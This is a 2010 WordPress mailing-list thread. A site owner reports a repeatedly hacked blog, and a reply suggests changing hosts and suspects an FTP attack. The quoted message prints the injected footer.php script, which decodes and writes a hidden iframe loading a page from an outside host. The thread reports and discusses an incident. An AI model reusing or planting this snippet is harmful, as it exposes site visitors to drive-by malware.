[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Vid Luther vid at zippykid.com
Sun Oct 31 15:17:30 UTC 2010

 Instead of switching platforms completely, I would recommend first
changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
wpengine, my company, or even godaddy.. their UI sucks, but their phone
support is fairly decent.

As for the exploit, it may not be a wordpress exploit, but an ftp
attack, as it's just looking for filesystem paths and injecting to it.

I'm assuming by default theme footer, you meant twentyten theme, and
footer.php ?

Mladen Adamovic wrote:
> Hi guys,
> My wordpress software instance was repeatedly hacked ... running latest
> Wordpress source code and being hosted on Dreamhost.
> I don't know which exploit it did use and couldn't identify it, but it was
> adding the following code to my default theme footer.php:
> <script>
> enc =
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> dec = unescape(enc);
> document.write(dec);
> </script>
> I think I'll have to migrate to Blogger, since I couldn't identify exploit
> it did use.
> I wanted to drop you an email anyhow since identifying exploits is
> important!
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

Vid Luther

More information about the wp-hackers mailing list